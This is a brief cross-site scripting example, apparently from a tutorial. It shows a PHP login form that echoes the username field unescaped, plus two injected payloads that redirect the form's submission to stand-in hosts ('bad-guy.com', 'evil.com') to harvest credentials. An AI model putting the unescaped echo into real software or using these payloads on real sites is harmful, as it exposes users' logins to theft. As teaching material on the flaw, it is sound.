XSS Example

XSS Example

XSS Example

        
              <form action="login.php" method="POST">
            
              User: <input type="text" name="username"
              value="<?php echo $_POST['username']; ?>" />
            
              Pass: <input type="password" name="password" />
            
              <input type="submit" name="Submit"
              value="Submit" />

        
              ./?username="><script> document.forms[0].action='http://bad-guy.com/harvest.php';
            
              </script><x x="

./?username=" onChange="document.forms[0].action='http://evil.com/harvest.php';